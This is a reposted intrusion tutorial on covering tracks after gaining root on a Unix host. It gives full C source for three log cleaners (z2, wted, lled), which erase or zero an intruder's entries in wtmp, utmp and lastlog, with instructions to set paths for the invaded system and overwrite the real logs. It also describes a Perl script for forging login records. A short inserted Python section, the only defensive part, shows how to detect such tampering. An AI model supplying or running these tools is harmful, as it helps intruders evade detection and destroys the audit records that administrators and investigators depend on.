How to hide yourself after entering the system

xiaoxiao2021-03-06  91


Zap2 (clears the wtmp / lastlog / utmp records). There are many different log cleaners on the network; the best of them is Zap2. I compile it as z2 and run it immediately after getting root. The program runs very quickly. You can use finger @host.xxx to see who is currently logged in and the admin's idle time, to guess whether they have left the host. After logging in, run ./z2; now you are much safer than before. Then use the w or who command to check the result. If you go on to use FTP or certain other commands, you will also need the two other programs provided in this chapter, wted and lled.

Let's finish the z2 program. You must know the location of each of these files on the system you invaded in order to edit z2.c so that it contains their correct paths. Below is the part of the file header you need to modify:

#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

On some systems this should be:

#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"

but you should check where these files are stored on the system you want to invade. The /var/log directory is also a very likely path. After setting the correct file paths, compile this file. Now, when you run z2 after logging in, you are safe. Here is the C program:

z2.c
------------------------- Cut here
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

/* Zero every utmp entry whose user name starts with who. */
void kill_utmp(char *who)
{
    struct utmp utmp_ent;

    if ((f = open(UTMP_NAME, O_RDWR)) >= 0) {
        while (read(f, &utmp_ent, sizeof(utmp_ent)) > 0)
            if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                bzero((char *)&utmp_ent, sizeof(utmp_ent));
                lseek(f, -(long)sizeof(utmp_ent), SEEK_CUR);
                write(f, &utmp_ent, sizeof(utmp_ent));
            }
        close(f);
    }
}

/* Walk wtmp backwards from the end and zero the most recent entry for who. */
void kill_wtmp(char *who)
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f = open(WTMP_NAME, O_RDWR)) >= 0) {
        while (pos != -1L) {
            lseek(f, -(long)(sizeof(struct utmp) * pos), SEEK_END);
            if (read(f, &utmp_ent, sizeof(struct utmp)) < 0) {
                pos = -1L;
            } else {
                if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                    bzero((char *)&utmp_ent, sizeof(struct utmp));
                    lseek(f, -(long)(sizeof(struct utmp) * pos), SEEK_END);
                    write(f, &utmp_ent, sizeof(utmp_ent));
                    pos = -1L;
                } else pos += 1L;
            }
        }
        close(f);
    }
}

/* lastlog is indexed by uid, so look the user up and zero that slot. */
void kill_lastlog(char *who)
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd = getpwnam(who)) != NULL) {
        if ((f = open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof(struct lastlog), SEEK_SET);
            bzero((char *)&newll, sizeof(newll));
            write(f, (char *)&newll, sizeof(newll));
            close(f);
        }
    } else printf("%s: ?\n", who);
}

int main(int argc, char *argv[])
{
    if (argc == 2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
        printf("Error.\n");
    return 0;
}
--------------------------- Cut here

-------------------------------------------------- ------------------------------

Other script programs

We now start another part of this chapter. Assume you have logged in and run z2, and now you need to FTP to fetch a file (remember, as the first chapter said, don't ftp or telnet out of the invaded host). OK, so you FTP into the system to grab a few files, or log in to other accounts on the system. Now you have to use the wted program. wted lets you edit the wtmp log to clear the record left by your FTP session. You may also use lled (which edits the lastlog log).

Once you have set the path of the log and compiled wted, typing ./wted shows the following menu:

[8:25pm][/home/compile] wted
Usage: wted -h -f file -a -z -b -x -u user -n user -e user -c host
	-h	This help
	-f	Use file instead of default
	-a	Show all entries found
	-u	Show all entries for user
	-b	Show null entries
	-e	Erase user completely
	-c	Erase all connections containing host
	-z	Show zap'd entries
	-x	Attempt to remove zap'd entries completely

If your FTP login was as tsmith, you would use wted -x -e tsmith. The program displays each entry for user tsmith with its time and asks whether you want to delete it. Remember, after you have deleted your login record, to chmod the wtmp.tmp file to 644 and then copy it into the log directory over the original:

1. chmod 644 wtmp.tmp
2. cp wtmp.tmp /var/adm/wtmp
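From the defender's side, the edits described above leave characteristic traces in wtmp: records zeroed in place by z2, records whose timestamp has been cleared (what wted -z lists), and logout records whose matching login has been dropped. The following is an added example, not part of the original article; it assumes the glibc 64-bit Linux utmp layout and runs on constructed sample records rather than a real log.

```python
import struct

# Assumed layout: glibc struct utmp on 64-bit Linux (384 bytes). Other
# systems use different layouts, so adjust UTMP_FMT before reading a real file.
UTMP_FMT = "<hxxi32s4s32s256shhi2i4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
USER_PROCESS, DEAD_PROCESS = 7, 8

def make_record(ut_type, pid, line, user, host, ts):
    """Pack one constructed wtmp record (sample data, not from a real host)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)

def audit_wtmp(data):
    """Return record indices that look like tampering:
    zeroed        - whole record is NUL bytes (what z2's bzero() leaves behind)
    zero_time     - fields set but ut_tv.sec == 0 (what wted -z calls 'zap'd')
    orphan_logout - DEAD_PROCESS on a line with no open login before it,
                    i.e. the login record was removed but its logout survived"""
    findings = {"zeroed": [], "zero_time": [], "orphan_logout": []}
    open_lines = set()
    for idx in range(len(data) // UTMP_SIZE):
        raw = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        if raw == b"\0" * UTMP_SIZE:
            findings["zeroed"].append(idx)
            continue
        ut_type, _, line, _, _, _, _, _, _, sec, *_ = struct.unpack(UTMP_FMT, raw)
        line = line.rstrip(b"\0")
        if sec == 0:
            findings["zero_time"].append(idx)
        if ut_type == USER_PROCESS:
            open_lines.add(line)
        elif ut_type == DEAD_PROCESS:
            if line not in open_lines:
                findings["orphan_logout"].append(idx)
            open_lines.discard(line)
    return findings

def sample_wtmp():
    """Constructed wtmp: alice's session is intact; bob's login was zeroed in
    place so only his logout remains; carol's login had its timestamp cleared."""
    recs = [
        make_record(USER_PROCESS, 1001, "pts/0", "alice", "10.0.0.5", 1700000000),
        make_record(DEAD_PROCESS, 1001, "pts/0", "", "", 1700003600),
        b"\0" * UTMP_SIZE,  # was bob's USER_PROCESS record on pts/1
        make_record(DEAD_PROCESS, 1002, "pts/1", "", "", 1700010800),
        make_record(USER_PROCESS, 1003, "pts/2", "carol", "10.0.0.9", 0),
    ]
    return b"".join(recs)

if __name__ == "__main__":
    for kind, idxs in audit_wtmp(sample_wtmp()).items():
        print(f"{kind}: records {idxs}")
```

On a real system point audit_wtmp at the bytes of /var/log/wtmp (or the wtmp.tmp left behind by wted), and treat any of the three findings as a reason to compare against auth logs or a remote syslog copy.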

Here is the wted program:

Important: remember to change the file path in these programs to the correct one for the system.

wted.c

---------------------- Cut here
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <utmp.h>
#include <time.h>
#include <fcntl.h>

char *file = "/var/adm/wtmp";

void printents(char *name);
void printinfo(struct utmp *ptr);
void erase(char *name, char *host);
void remnull(char *name);
void usage(void);

int main(int argc, char *argv[])
{
    int i;

    if (argc == 1) usage();
    for (i = 1; i < argc; i++) {
        if (argv[i][0] == '-') {
            switch (argv[i][1]) {
                case 'b': printents(""); break;
                case 'z': printents("Z4P"); break;
                case 'e': erase(argv[i + 1], 0); break;
                case 'c': erase(0, argv[i + 1]); break;
                case 'f': file = argv[i + 1]; break;
                case 'u': printents(argv[i + 1]); break;
                case 'a': printents("*"); break;
                case 'x': remnull(argv[i + 1]); break;
                default: usage();
            }
        }
    }
    return 0;
}

/* Print entries for name; "*" means every entry, "" means null entries
   and "Z4P" means entries whose timestamp has been zeroed. */
void printents(char *name)
{
    struct utmp utmp, *ptr;
    int fp = -1;

    ptr = &utmp;
    if ((fp = open(file, O_RDONLY)) >= 0) {
        while (read(fp, &utmp, sizeof(struct utmp)) == sizeof(struct utmp)) {
            if (!strcmp(name, ptr->ut_name) || !strcmp(name, "*") ||
                (!strcmp("Z4P", name) && ptr->ut_time == 0))
                printinfo(ptr);
        }
        close(fp);
    }
}

void printinfo(struct utmp *ptr)
{
    char tmpstr[256];
    time_t t = ptr->ut_time;   /* ut_time is not a time_t on every system */

    /* the utmp string fields are not guaranteed to be NUL-terminated */
    printf("%.*s\t", (int)sizeof(ptr->ut_name), ptr->ut_name);
    printf("%.*s\t", (int)sizeof(ptr->ut_line), ptr->ut_line);
    strcpy(tmpstr, ctime(&t));
    tmpstr[strlen(tmpstr) - 1] = '\0';   /* drop the newline ctime() appends */
    printf("%s\t", tmpstr);
    printf("%.*s\n", (int)sizeof(ptr->ut_host), ptr->ut_host);
}

/* Copy the log to wtmp.tmp, dropping every entry that mentions host and
   asking about each entry that belongs to name. */
void erase(char *name, char *host)
{
    int fp = -1, fd = -1, tot = 0, cnt = 0, n = 0;
    struct utmp utmp;
    unsigned char c;

    if ((fp = open(file, O_RDONLY)) >= 0) {
        /* mode and O_TRUNC added: the original passed no mode to O_CREAT */
        fd = open("wtmp.tmp", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        while (read(fp, &utmp, sizeof(struct utmp)) == sizeof(struct utmp)) {
            if (host) {
                if (strstr(utmp.ut_host, host)) tot++;
                else { cnt++; write(fd, &utmp, sizeof(struct utmp)); }
            }
            if (name) {
                if (strcmp(utmp.ut_name, name)) {
                    cnt++;
                    write(fd, &utmp, sizeof(struct utmp));
                } else {
                    if (n > 0) {
                        n--; cnt++;
                        write(fd, &utmp, sizeof(struct utmp));
                    } else {
                        printinfo(&utmp);
                        printf("Erase entry (y/n/f(astforward))? ");
                        c = 'a';
                        while (c != 'y' && c != 'n' && c != 'f') c = getc(stdin);
                        if (c == 'f') {
                            cnt++;
                            write(fd, &utmp, sizeof(struct utmp));
                            printf("Fast forward how many entries? ");
                            scanf("%d", &n);
                        }
                        if (c == 'n') {
                            cnt++;
                            write(fd, &utmp, sizeof(struct utmp));
                        }
                        if (c == 'y') tot++;
                    }
                }
            }
        }
        close(fp);
        close(fd);
    }
    printf("Entries stored: %d Entries removed: %d\n", cnt, tot);
    printf("Now chmod wtmp.tmp and copy over the original %s\n", file);
}

/* Copy the log to wtmp.tmp, leaving out entries whose timestamp is zero. */
void remnull(char *name)
{
    int fp = -1, fd = -1, tot = 0, cnt = 0;
    struct utmp utmp;

    if ((fp = open(file, O_RDONLY)) >= 0) {
        fd = open("wtmp.tmp", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        while (read(fp, &utmp, sizeof(struct utmp)) == sizeof(struct utmp)) {
            if (utmp.ut_time) {
                cnt++;
                write(fd, &utmp, sizeof(struct utmp));
            } else
                tot++;
        }
        close(fp);
        close(fd);
    }
    printf("Entries stored: %d Entries removed: %d\n", cnt, tot);
    printf("Now chmod wtmp.tmp and copy over the original %s\n", file);
}

void usage(void)
{
    printf("Usage: wted -h -f file -a -z -b -x -u user -n user -e user -c host\n");
    printf("\t-h\tThis help\n");
    printf("\t-f\tUse file instead of default\n");
    printf("\t-a\tShow all entries found\n");
    printf("\t-u\tShow all entries for user\n");
    printf("\t-b\tShow null entries\n");
    printf("\t-e\tErase user completely\n");
    printf("\t-c\tErase all connections containing host\n");
    printf("\t-z\tShow zap'd entries\n");
    printf("\t-x\tAttempt to remove zap'd entries completely\n");
}
---------------------- Cut here

You may also need to clear the /var/adm/lastlog log. For this, use the lled.c program. Compile the file and name the result lled. You will see the following menu when you run lled:

[4:04am][/home/paris/compile] lled
Usage: lled -h -f file -a -z -b -x -u user -n user -e user -c host
	-h	This help
	-f	Use file instead of default
	-a	Show all entries found
	-u	Show all entries for user
	-b	Show null entries
	-e	Erase user completely
	-c	Erase all connections containing host
	-z	Show zap'd entries
	-x	Attempt to remove zap'd entries completely

You can use -u to look at it. Many times your username is not recorded, but your host will be, so usually you can

Sample use (suppose the host I used when I entered the system was machine.edit.com):

lled -e username -c machine.edit

If you want to see whether your host is still recorded at the end of the lastlog log, enter: lled -a

Use chmod to set the lastlog.tmp file to 644 and copy it over the log file, just as you did with the wted program above.

Important: set the lastlog path to the correct path on the host you invaded.

Here is lled.c:

-------------------------- Cut here

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <utmp.h>
#include <lastlog.h>
#include <time.h>
#include <fcntl.h>

char *file = "/var/adm/lastlog";

void printents(char *name);
void printinfo(struct lastlog *ptr);
void erase(char *name, char *host);
void remnull(char *name);
void usage(void);

int main(int argc, char *argv[])
{
    int i;

    if (argc == 1) usage();
    for (i = 1; i < argc; i++) {
        if (argv[i][0] == '-') {
            switch (argv[i][1]) {
                case 'b': printents(""); break;
                case 'z': printents("Z4P"); break;
                case 'e': erase(argv[i + 1], 0); break;
                case 'c': erase(0, argv[i + 1]); break;
                case 'f': file = argv[i + 1]; break;
                case 'u': printents(argv[i + 1]); break;
                case 'a': printents("*"); break;
                case 'x': remnull(argv[i + 1]); break;
                default: usage();
            }
        }
    }
    return 0;
}

/* lastlog has no user name field; entries are matched on ll_line (the tty).
   "*" means every entry, "" null entries, "Z4P" entries with a zero time. */
void printents(char *name)
{
    struct lastlog utmp, *ptr;
    int fp = -1;

    ptr = &utmp;
    if ((fp = open(file, O_RDONLY)) >= 0) {
        while (read(fp, &utmp, sizeof(struct lastlog)) == sizeof(struct lastlog)) {
            if (!strcmp(name, ptr->ll_line) || !strcmp(name, "*") ||
                (!strcmp("Z4P", name) && ptr->ll_time == 0))
                printinfo(ptr);
        }
        close(fp);
    }
}

void printinfo(struct lastlog *ptr)
{
    char tmpstr[256];
    time_t t = ptr->ll_time;   /* ll_time is not a time_t on every system */

    printf("%.*s\t", (int)sizeof(ptr->ll_line), ptr->ll_line);
    strcpy(tmpstr, ctime(&t));
    tmpstr[strlen(tmpstr) - 1] = '\0';   /* drop the newline ctime() appends */
    printf("%s\t", tmpstr);
    printf("%.*s\n", (int)sizeof(ptr->ll_host), ptr->ll_host);
}

/* Copy the log to lastlog.tmp, dropping every entry that mentions host and
   asking about each entry whose line matches name. */
void erase(char *name, char *host)
{
    int fp = -1, fd = -1, tot = 0, cnt = 0, n = 0;
    struct lastlog utmp;
    unsigned char c;

    if ((fp = open(file, O_RDONLY)) >= 0) {
        /* mode and O_TRUNC added: the original passed no mode to O_CREAT */
        fd = open("lastlog.tmp", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        while (read(fp, &utmp, sizeof(struct lastlog)) == sizeof(struct lastlog)) {
            if (host) {
                if (strstr(utmp.ll_host, host)) tot++;
                else { cnt++; write(fd, &utmp, sizeof(struct lastlog)); }
            }
            if (name) {
                if (strcmp(utmp.ll_line, name)) {
                    cnt++;
                    write(fd, &utmp, sizeof(struct lastlog));
                } else {
                    if (n > 0) {
                        n--; cnt++;
                        write(fd, &utmp, sizeof(struct lastlog));
                    } else {
                        printinfo(&utmp);
                        printf("Erase entry (y/n/f(astforward))? ");
                        c = 'a';
                        while (c != 'y' && c != 'n' && c != 'f') c = getc(stdin);
                        if (c == 'f') {
                            cnt++;
                            write(fd, &utmp, sizeof(struct lastlog));
                            printf("Fast forward how many entries? ");
                            scanf("%d", &n);
                        }
                        if (c == 'n') {
                            cnt++;
                            write(fd, &utmp, sizeof(struct lastlog));
                        }
                        if (c == 'y') tot++;
                    }
                }
            }
        }
        close(fp);
        close(fd);
    }
    printf("Entries stored: %d Entries removed: %d\n", cnt, tot);
    printf("Now chmod lastlog.tmp and copy over the original %s\n", file);
}

/* Copy the log to lastlog.tmp, leaving out entries whose time is zero. */
void remnull(char *name)
{
    int fp = -1, fd = -1, tot = 0, cnt = 0;
    struct lastlog utmp;

    if ((fp = open(file, O_RDONLY)) >= 0) {
        fd = open("lastlog.tmp", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        while (read(fp, &utmp, sizeof(struct lastlog)) == sizeof(struct lastlog)) {
            if (utmp.ll_time) {
                cnt++;
                write(fd, &utmp, sizeof(struct lastlog));
            } else
                tot++;
        }
        close(fp);
        close(fd);
    }
    printf("Entries stored: %d Entries removed: %d\n", cnt, tot);
    printf("Now chmod lastlog.tmp and copy over the original %s\n", file);
}

void usage(void)
{
    printf("Usage: lled -h -f file -a -z -b -x -u user -n user -e user -c host\n");
    printf("\t-h\tThis help\n");
    printf("\t-f\tUse file instead of default\n");
    printf("\t-a\tShow all entries found\n");
    printf("\t-u\tShow all entries for user\n");
    printf("\t-b\tShow null entries\n");
    printf("\t-e\tErase user completely\n");
    printf("\t-c\tErase all connections containing host\n");
    printf("\t-z\tShow zap'd entries\n");
    printf("\t-x\tAttempt to remove zap'd entries completely\n");
}
---------------------------------------------------------------- Cut here

Here is a good Perl script that edits utmp and wtmp and checks processes. The program also lets you add a line to the wtmp log. If you want, you can make it look as if clinton@whitehouse.gov logged in on port ttyp3 and stayed in the system for a few hours!

Using the check function, you can find out whether anyone is logged in to the system without a record in the utmp log. System administrators sometimes like to hide themselves from the records too, and this program can show whether they are online. You must have root permissions to run this program, and it requires Perl 5.003 or later. Type help after starting the script.

Here are some basic commands:

starts by loading wtmp
delete username
delete host hostname
write
read wtmp
delete username
delete host hostname
write

Use help to view the other commands... This is the best utmp/wtmp editor.

Say thank you ;)

Please credit the original source when reposting: https://www.9cbs.com/read-122249.html
